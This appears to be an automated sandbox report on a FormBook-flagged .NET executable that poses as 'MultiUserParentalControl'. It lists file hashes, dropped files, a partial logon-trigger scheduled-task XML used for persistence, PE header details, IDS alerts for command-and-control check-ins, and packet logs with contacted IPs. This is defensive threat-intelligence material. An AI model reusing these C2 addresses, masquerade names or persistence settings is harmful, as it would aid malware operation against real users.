                                                                          OVHFRJAAkR51fQY.exeGet hashmaliciousBrowse
                                                                          • 149.202.23.211
                                                                          Notification_71823.xlsGet hashmaliciousBrowse
                                                                          • 51.254.89.251
                                                                          Notification_71823.xlsGet hashmaliciousBrowse
                                                                          • 51.254.89.251
                                                                          Notification_71823.xlsGet hashmaliciousBrowse
                                                                          • 51.254.89.251
                                                                          cremocompany-Invoice_216083-xlsx.htmlGet hashmaliciousBrowse
                                                                          • 51.91.224.95
                                                                          brewin-Invoice024768-xlsx.HtmlGet hashmaliciousBrowse
                                                                          • 145.239.131.55
                                                                          Documentos de pago.PDF.exeGet hashmaliciousBrowse
                                                                          • 51.195.53.221
                                                                          facturas y datos bancarios.PDF____________.exeGet hashmaliciousBrowse
                                                                          • 51.195.53.221
                                                                          Consignment Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                                          • 149.202.195.78
                                                                          cGLVytu1ps.exeGet hashmaliciousBrowse
                                                                          • 213.186.33.5
                                                                          pHUWiFd56t.exeGet hashmaliciousBrowse
                                                                          • 142.44.212.169
                                                                          Company Docs.exeGet hashmaliciousBrowse
                                                                          • 54.39.152.114
                                                                          AG60273928I_COVID-19_SARS-CoV-2.docGet hashmaliciousBrowse
                                                                          • 51.79.161.36
                                                                          FQ5754217297FF.docGet hashmaliciousBrowse
                                                                          • 51.79.161.36
                                                                          FQ5754217297FF.docGet hashmaliciousBrowse
                                                                          • 51.79.161.36
                                                                          l0sjk3o.dllGet hashmaliciousBrowse
                                                                          • 46.105.131.65
                                                                          Consignment Details.exeGet hashmaliciousBrowse
                                                                          • 51.91.31.221
                                                                          tEsPDds30F.exeGet hashmaliciousBrowse
                                                                          • 46.105.131.65
                                                                          neidyjzyu.dllGet hashmaliciousBrowse
                                                                          • 46.105.131.65
                                                                          kmqwedm.dllGet hashmaliciousBrowse
                                                                          • 46.105.131.65

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                            Match:C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe
                                                                            Associated Sample Name / URL:Order_00009.xlsx
                                                                            Detection:malicious

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\J0OmHIagw8.exe.log
                                                                            Process:C:\Users\user\Desktop\J0OmHIagw8.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1216
                                                                            Entropy (8bit):5.355304211458859
                                                                            Encrypted:false
                                                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                            MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                            SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                            SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                            SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                            Malicious:true
                                                                            Reputation:high, very likely benign file
                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                            C:\Users\user\AppData\Local\Temp\tmpF65F.tmp
                                                                            Process:C:\Users\user\Desktop\J0OmHIagw8.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1646
                                                                            Entropy (8bit):5.194647878447671
                                                                            Encrypted:false
                                                                            SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB1tn:cbh47TlNQ//rydbz9I3YODOLNdq31
                                                                            MD5:06E33287E0C8713556ABA4895AB6E7A7
                                                                            SHA1:2A2D4CAC8873931736CBBB63A52A57258472F145
                                                                            SHA-256:2C8A59AA46BD19E023BB68BF13C95C6F5F853ABE23AAD49CA14082BB7CB05BED
                                                                            SHA-512:12F4619DE659BCD68B646F11B5EB6BB062CE87ECF09B1BA01E0E50E3F527011FA829DAA307931607E9F37FA66C47DBE6A405F7BD718D02E0B698EF91E1BA16CD
                                                                            Malicious:true
                                                                            Reputation:low
                                                                            Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                                            C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe
                                                                            Process:C:\Users\user\Desktop\J0OmHIagw8.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):582656
                                                                            Entropy (8bit):7.865649202994036
                                                                            Encrypted:false
                                                                            SSDEEP:12288:fKNVSrQjhTHD1L3YhRr/3DRaRDt2eM2pB81ey:8VMyzDJYhRrFadt2c1
                                                                            MD5:92FF500A693078263908C83B4B290481
                                                                            SHA1:FA5DCC6012C71490EFDF320791A90C7A18958A95
                                                                            SHA-256:767B1B32D4AC4CEC73967590CA5B28C3E0F4D709C0773E3F4021774F15A2483A
                                                                            SHA-512:8478C8B88309D55C83AB4A5F3AF0367F19BB02A2B62DB4A790FF7E867AA0FFE422CD4D177BBD3AD25D19CD0049ED196EC3910A72C7E3935FED0991CC783F0D1D
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Joe Sandbox View:
                                                                            • Filename: Order_00009.xlsx, Detection: malicious
                                                                            Reputation:low
                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j.l...............0......(........... ........@.. .......................@............@.................................D...O........$................... ......(................................................ ............... ..H............text........ ...................... ..`.rsrc....$.......&..................@..@.reloc....... ......................@..B................x.......H...........\.......K...@K..............................................0..B........s.........(.......(.....(.......(....o.......s....(.......(.....*".(.....*..0..............r...p..(......9.........s........s ......8........a...%..=.o!.........o"...ri..p(#.......,q.....o"....(#.......,Z.+:....a...%..=.o!.........o"...r{..p(#.......,.......($...&...o%...%.r...po&..........-......o%...%........:L......&......o'........&.......+...*.......,......................0...........s(.

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):7.865649202994036
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            File name:J0OmHIagw8.exe
                                                                            File size:582656
                                                                            MD5:92ff500a693078263908c83b4b290481
                                                                            SHA1:fa5dcc6012c71490efdf320791a90c7a18958a95
                                                                            SHA256:767b1b32d4ac4cec73967590ca5b28c3e0f4d709c0773e3f4021774f15a2483a
                                                                            SHA512:8478c8b88309d55c83ab4a5f3af0367f19bb02a2b62db4a790ff7e867aa0ffe422cd4d177bbd3ad25d19cd0049ed196ec3910a72c7e3935fed0991cc783f0d1d
                                                                            SSDEEP:12288:fKNVSrQjhTHD1L3YhRr/3DRaRDt2eM2pB81ey:8VMyzDJYhRrFadt2c1
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j.l...............0......(........... ........@.. .......................@............@................................

                                                                            File Icon

                                                                            Icon Hash:10d0c4ccccc4f000

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x48d896
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                            Time Stamp:0x8C6CE96A [Sat Aug 27 21:58:02 2044 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:v4.0.30319
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            jmp dword ptr [00402000h]
                                                                            (the remaining preview bytes are zero padding, which disassembles as a long run of "add byte ptr [eax], al"; the jump target 0x402000 is imagebase 0x400000 plus the IAT at RVA 0x2000 listed under Data Directories, i.e. the entrypoint does nothing but jump through the single imported thunk, as is usual for a .NET executable)

                                                                            Data Directories

                                                                            Name                                  Virtual Address  Virtual Size  Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT          0x8d844          0x4f          .text
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE        0x8e000          0x2414        .rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC       0x92000          0xc           .reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG           0x8d828          0x1c          .text
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0x8b89c       0x8ba00   False     0.909556498993   data       7.87325624696   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x8e000          0x2414        0x2600    False     0.834703947368   data       7.55839621208   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x92000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name           RVA      Size    Type                                                                         Language  Country
RT_ICON        0x8e130  0x1d9d  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_GROUP_ICON  0x8fed0  0x14    data
RT_VERSION     0x8fee4  0x344   data
RT_MANIFEST    0x90228  0x1ea   XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL          Import
mscoree.dll  _CorExeMain

Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright 2019
Assembly Version  1.0.0.0
InternalName      .exe
FileVersion       1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName       MultiUserParentalControl
ProductVersion    1.0.0.0
FileDescription   MultiUserParentalControl
OriginalFilename  .exe

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                                        Source Port  Dest Port  Source IP        Dest IP
01/13/21-21:04:29.053590  ICMP      402      ICMP Destination Unreachable Port Unreachable                           192.168.2.3      8.8.8.8
01/13/21-21:04:33.449709  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)           49742        80         192.168.2.3      173.234.175.134
01/13/21-21:04:33.449709  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)           49742        80         192.168.2.3      173.234.175.134
01/13/21-21:04:33.449709  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)           49742        80         192.168.2.3      173.234.175.134
01/13/21-21:04:49.742833  TCP       2016803  ET TROJAN Known Sinkhole Response Header       80           49755      45.77.226.209    192.168.2.3
01/13/21-21:04:54.974946  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)           49756        80         192.168.2.3      142.44.212.169
01/13/21-21:04:54.974946  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)           49756        80         192.168.2.3      142.44.212.169
01/13/21-21:04:54.974946  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)           49756        80         192.168.2.3      142.44.212.169
01/13/21-21:05:00.772898  TCP       1201     ATTACK-RESPONSES 403 Forbidden                 80           49758      34.102.136.180   192.168.2.3
01/13/21-21:05:11.046991  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)           49760        80         192.168.2.3      34.102.136.180
01/13/21-21:05:11.046991  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)           49760        80         192.168.2.3      34.102.136.180
01/13/21-21:05:11.046991  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)           49760        80         192.168.2.3      34.102.136.180
01/13/21-21:05:11.186150  TCP       1201     ATTACK-RESPONSES 403 Forbidden                 80           49760      34.102.136.180   192.168.2.3
01/13/21-21:05:22.236081  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)           49761        80         192.168.2.3      192.155.166.181
01/13/21-21:05:22.236081  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)           49761        80         192.168.2.3      192.155.166.181
01/13/21-21:05:22.236081  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)           49761        80         192.168.2.3      192.155.166.181
01/13/21-21:05:27.905106  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)           49765        80         192.168.2.3      205.134.254.189
01/13/21-21:05:27.905106  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)           49765        80         192.168.2.3      205.134.254.189
01/13/21-21:05:27.905106  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)           49765        80         192.168.2.3      205.134.254.189
01/13/21-21:05:58.107974  ICMP      402      ICMP Destination Unreachable Port Unreachable                           192.168.2.3      8.8.8.8
01/13/21-21:05:59.126867  ICMP      402      ICMP Destination Unreachable Port Unreachable                           192.168.2.3      8.8.8.8
01/13/21-21:06:02.573239  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)           49769        80         192.168.2.3      173.234.175.134
01/13/21-21:06:02.573239  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)           49769        80         192.168.2.3      173.234.175.134
01/13/21-21:06:02.573239  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)           49769        80         192.168.2.3      173.234.175.134
01/13/21-21:06:18.245893  TCP       2016803  ET TROJAN Known Sinkhole Response Header       80           49771      45.77.226.209    192.168.2.3
01/13/21-21:06:23.388032  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)           49772        80         192.168.2.3      142.44.212.169
01/13/21-21:06:23.388032  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)           49772        80         192.168.2.3      142.44.212.169
01/13/21-21:06:23.388032  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)           49772        80         192.168.2.3      142.44.212.169

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Jan 13, 2021 21:04:33.256691933 CET  49742        80         192.168.2.3      173.234.175.134
Jan 13, 2021 21:04:33.448252916 CET  80           49742      173.234.175.134  192.168.2.3
Jan 13, 2021 21:04:33.449577093 CET  49742        80         192.168.2.3      173.234.175.134
Jan 13, 2021 21:04:33.449708939 CET  49742        80         192.168.2.3      173.234.175.134
Jan 13, 2021 21:04:33.642399073 CET  80           49742      173.234.175.134  192.168.2.3
Jan 13, 2021 21:04:33.642426014 CET  80           49742      173.234.175.134  192.168.2.3
Jan 13, 2021 21:04:33.642443895 CET  80           49742      173.234.175.134  192.168.2.3
Jan 13, 2021 21:04:33.642457962 CET  80           49742      173.234.175.134  192.168.2.3
Jan 13, 2021 21:04:33.642595053 CET  49742        80         192.168.2.3      173.234.175.134
Jan 13, 2021 21:04:33.642644882 CET  49742        80         192.168.2.3      173.234.175.134
Jan 13, 2021 21:04:33.833941936 CET  80           49742      173.234.175.134  192.168.2.3
Jan 13, 2021 21:04:49.625839949 CET  49755        80         192.168.2.3      45.77.226.209
Jan 13, 2021 21:04:49.676454067 CET  80           49755      45.77.226.209    192.168.2.3
Jan 13, 2021 21:04:49.678884029 CET  49755        80         192.168.2.3      45.77.226.209
Jan 13, 2021 21:04:49.690268040 CET  49755        80         192.168.2.3      45.77.226.209
Jan 13, 2021 21:04:49.740910053 CET  80           49755      45.77.226.209    192.168.2.3
Jan 13, 2021 21:04:49.742832899 CET  80           49755      45.77.226.209    192.168.2.3
Jan 13, 2021 21:04:49.742876053 CET  80           49755      45.77.226.209    192.168.2.3
Jan 13, 2021 21:04:49.743067026 CET  49755        80         192.168.2.3      45.77.226.209
Jan 13, 2021 21:04:49.743123055 CET  49755        80         192.168.2.3      45.77.226.209
Jan 13, 2021 21:04:49.793448925 CET  80           49755      45.77.226.209    192.168.2.3
Jan 13, 2021 21:04:54.838032007 CET  49756        80         192.168.2.3      142.44.212.169
Jan 13, 2021 21:04:54.974657059 CET  80           49756      142.44.212.169   192.168.2.3
Jan 13, 2021 21:04:54.974843979 CET  49756        80         192.168.2.3      142.44.212.169
Jan 13, 2021 21:04:54.974946022 CET  49756        80         192.168.2.3      142.44.212.169
Jan 13, 2021 21:04:55.111336946 CET  80           49756      142.44.212.169   192.168.2.3
Jan 13, 2021 21:04:55.482732058 CET  49756        80         192.168.2.3      142.44.212.169
Jan 13, 2021 21:04:55.659183025 CET  80           49756      142.44.212.169   192.168.2.3
Jan 13, 2021 21:04:55.720679045 CET  80           49756      142.44.212.169   192.168.2.3
Jan 13, 2021 21:04:55.720735073 CET  80           49756      142.44.212.169   192.168.2.3
Jan 13, 2021 21:04:55.720894098 CET  49756        80         192.168.2.3      142.44.212.169
Jan 13, 2021 21:04:55.720959902 CET  49756        80         192.168.2.3      142.44.212.169
Jan 13, 2021 21:05:00.593950987 CET  49758        80         192.168.2.3      34.102.136.180
Jan 13, 2021 21:05:00.633949041 CET  80           49758      34.102.136.180   192.168.2.3
Jan 13, 2021 21:05:00.634141922 CET  49758        80         192.168.2.3      34.102.136.180
Jan 13, 2021 21:05:00.634299994 CET  49758        80         192.168.2.3      34.102.136.180
Jan 13, 2021 21:05:00.674240112 CET  80           49758      34.102.136.180   192.168.2.3
Jan 13, 2021 21:05:00.772897959 CET  80           49758      34.102.136.180   192.168.2.3
Jan 13, 2021 21:05:00.772942066 CET  80           49758      34.102.136.180   192.168.2.3
Jan 13, 2021 21:05:00.773113012 CET  49758        80         192.168.2.3      34.102.136.180
Jan 13, 2021 21:05:00.773164988 CET  49758        80         192.168.2.3      34.102.136.180
Jan 13, 2021 21:05:00.813136101 CET  80           49758      34.102.136.180   192.168.2.3
Jan 13, 2021 21:05:05.852662086 CET  49759        80         192.168.2.3      192.0.78.208
Jan 13, 2021 21:05:05.892638922 CET  80           49759      192.0.78.208     192.168.2.3
Jan 13, 2021 21:05:05.892823935 CET  49759        80         192.168.2.3      192.0.78.208
Jan 13, 2021 21:05:05.893126011 CET  49759        80         192.168.2.3      192.0.78.208
Jan 13, 2021 21:05:05.933036089 CET  80           49759      192.0.78.208     192.168.2.3
Jan 13, 2021 21:05:05.933063984 CET  80           49759      192.0.78.208     192.168.2.3
Jan 13, 2021 21:05:05.933075905 CET  80           49759      192.0.78.208     192.168.2.3
Jan 13, 2021 21:05:05.933339119 CET  49759        80         192.168.2.3      192.0.78.208
Jan 13, 2021 21:05:05.933398008 CET  49759        80         192.168.2.3      192.0.78.208
Jan 13, 2021 21:05:05.973464966 CET  80           49759      192.0.78.208     192.168.2.3
Jan 13, 2021 21:05:11.006270885 CET  49760        80         192.168.2.3      34.102.136.180
Jan 13, 2021 21:05:11.046574116 CET  80           49760      34.102.136.180   192.168.2.3
Jan 13, 2021 21:05:11.046734095 CET  49760        80         192.168.2.3      34.102.136.180
Jan 13, 2021 21:05:11.046991110 CET  49760        80         192.168.2.3      34.102.136.180
Jan 13, 2021 21:05:11.087112904 CET  80           49760      34.102.136.180   192.168.2.3
Jan 13, 2021 21:05:11.186150074 CET  80           49760      34.102.136.180   192.168.2.3
Jan 13, 2021 21:05:11.186450005 CET  49760        80         192.168.2.3      34.102.136.180
Jan 13, 2021 21:05:11.186574936 CET  80           49760      34.102.136.180   192.168.2.3
Jan 13, 2021 21:05:11.186657906 CET  49760        80         192.168.2.3      34.102.136.180
Jan 13, 2021 21:05:11.226603985 CET  80           49760      34.102.136.180   192.168.2.3
Jan 13, 2021 21:05:21.584244013 CET  49761        80         192.168.2.3      192.155.166.181
Jan 13, 2021 21:05:21.804228067 CET  80           49761      192.155.166.181  192.168.2.3
Jan 13, 2021 21:05:21.805689096 CET  49761        80         192.168.2.3      192.155.166.181
Jan 13, 2021 21:05:22.236080885 CET  49761        80         192.168.2.3      192.155.166.181
Jan 13, 2021 21:05:22.456119061 CET  80           49761      192.155.166.181  192.168.2.3
Jan 13, 2021 21:05:22.461457014 CET  80           49761      192.155.166.181  192.168.2.3
Jan 13, 2021 21:05:22.461481094 CET  80           49761      192.155.166.181  192.168.2.3
Jan 13, 2021 21:05:22.461760044 CET  49761        80         192.168.2.3      192.155.166.181
Jan 13, 2021 21:05:22.462353945 CET  49761        80         192.168.2.3      192.155.166.181
Jan 13, 2021 21:05:22.682168961 CET  80           49761      192.155.166.181  192.168.2.3
Jan 13, 2021 21:05:27.708574057 CET  49765        80         192.168.2.3      205.134.254.189
Jan 13, 2021 21:05:27.904743910 CET  80           49765      205.134.254.189  192.168.2.3
Jan 13, 2021 21:05:27.904849052 CET  49765        80         192.168.2.3      205.134.254.189
Jan 13, 2021 21:05:27.905106068 CET  49765        80         192.168.2.3      205.134.254.189
Jan 13, 2021 21:05:28.101125002 CET  80           49765      205.134.254.189  192.168.2.3
Jan 13, 2021 21:05:28.102826118 CET  80           49765      205.134.254.189  192.168.2.3
Jan 13, 2021 21:05:28.102847099 CET  80           49765      205.134.254.189  192.168.2.3
Jan 13, 2021 21:05:28.103200912 CET  49765        80         192.168.2.3      205.134.254.189
Jan 13, 2021 21:05:28.103319883 CET  49765        80         192.168.2.3      205.134.254.189
Jan 13, 2021 21:05:28.299376011 CET  80           49765      205.134.254.189  192.168.2.3
Jan 13, 2021 21:05:38.449443102 CET  49766        80         192.168.2.3      146.148.193.212
Jan 13, 2021 21:05:38.634325981 CET  80           49766      146.148.193.212  192.168.2.3
Jan 13, 2021 21:05:38.638170004 CET  49766        80         192.168.2.3      146.148.193.212
Jan 13, 2021 21:05:38.638372898 CET  49766        80         192.168.2.3      146.148.193.212
Jan 13, 2021 21:05:38.823539019 CET  80           49766      146.148.193.212  192.168.2.3
Jan 13, 2021 21:05:38.823584080 CET  80           49766      146.148.193.212  192.168.2.3
Jan 13, 2021 21:05:38.823596001 CET  80           49766      146.148.193.212  192.168.2.3
Jan 13, 2021 21:05:38.824080944 CET  49766        80         192.168.2.3      146.148.193.212
Jan 13, 2021 21:05:38.824233055 CET  49766        80         192.168.2.3      146.148.193.212
Jan 13, 2021 21:05:38.833403111 CET  80           49766      146.148.193.212  192.168.2.3
Jan 13, 2021 21:05:38.833514929 CET  49766        80         192.168.2.3      146.148.193.212
Jan 13, 2021 21:05:39.009578943 CET  80           49766      146.148.193.212  192.168.2.3
Jan 13, 2021 21:05:44.224528074 CET  49767        80         192.168.2.3      23.105.124.225
Jan 13, 2021 21:05:44.418430090 CET  80           49767      23.105.124.225   192.168.2.3
Jan 13, 2021 21:05:44.419608116 CET  49767        80         192.168.2.3      23.105.124.225
Jan 13, 2021 21:05:44.419821978 CET  49767        80         192.168.2.3      23.105.124.225
Jan 13, 2021 21:05:44.658860922 CET  80           49767      23.105.124.225   192.168.2.3
Jan 13, 2021 21:05:44.924233913 CET  49767        80         192.168.2.3      23.105.124.225

UDP Packets

Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Jan 13, 2021 21:03:32.107090950 CET  65110        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:03:32.155076981 CET  53           65110      8.8.8.8          192.168.2.3
Jan 13, 2021 21:03:33.403271914 CET  58361        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:03:33.451320887 CET  53           58361      8.8.8.8          192.168.2.3
Jan 13, 2021 21:03:34.588206053 CET  63492        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:03:34.640042067 CET  53           63492      8.8.8.8          192.168.2.3
Jan 13, 2021 21:03:35.807763100 CET  60831        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:03:35.866738081 CET  53           60831      8.8.8.8          192.168.2.3
Jan 13, 2021 21:03:36.795548916 CET  60100        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:03:36.847487926 CET  53           60100      8.8.8.8          192.168.2.3
Jan 13, 2021 21:03:38.062551022 CET  53195        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:03:38.110658884 CET  53           53195      8.8.8.8          192.168.2.3
Jan 13, 2021 21:03:39.532286882 CET  50141        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:03:39.582921982 CET  53           50141      8.8.8.8          192.168.2.3
Jan 13, 2021 21:03:40.645405054 CET  53023        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:03:40.693166971 CET  53           53023      8.8.8.8          192.168.2.3
Jan 13, 2021 21:03:41.567195892 CET  49563        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:03:41.615120888 CET  53           49563      8.8.8.8          192.168.2.3
Jan 13, 2021 21:03:42.791860104 CET  51352        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:03:42.839807034 CET  53           51352      8.8.8.8          192.168.2.3
Jan 13, 2021 21:03:44.707129002 CET  59349        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:03:44.755547047 CET  53           59349      8.8.8.8          192.168.2.3
Jan 13, 2021 21:03:45.937158108 CET  57084        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:03:45.985148907 CET  53           57084      8.8.8.8          192.168.2.3
Jan 13, 2021 21:03:47.207340002 CET  58823        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:03:47.255136967 CET  53           58823      8.8.8.8          192.168.2.3
Jan 13, 2021 21:03:48.196248055 CET  57568        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:03:48.245688915 CET  53           57568      8.8.8.8          192.168.2.3
Jan 13, 2021 21:03:50.160382986 CET  50540        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:03:50.214705944 CET  53           50540      8.8.8.8          192.168.2.3
Jan 13, 2021 21:03:56.003659010 CET  54366        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:03:56.082838058 CET  53           54366      8.8.8.8          192.168.2.3
Jan 13, 2021 21:04:01.437932014 CET  53034        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:04:01.485913992 CET  53           53034      8.8.8.8          192.168.2.3
Jan 13, 2021 21:04:15.029310942 CET  57762        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:04:15.086632013 CET  53           57762      8.8.8.8          192.168.2.3
Jan 13, 2021 21:04:19.399761915 CET  55435        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:04:19.448080063 CET  53           55435      8.8.8.8          192.168.2.3
Jan 13, 2021 21:04:20.814989090 CET  50713        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:04:20.875763893 CET  53           50713      8.8.8.8          192.168.2.3
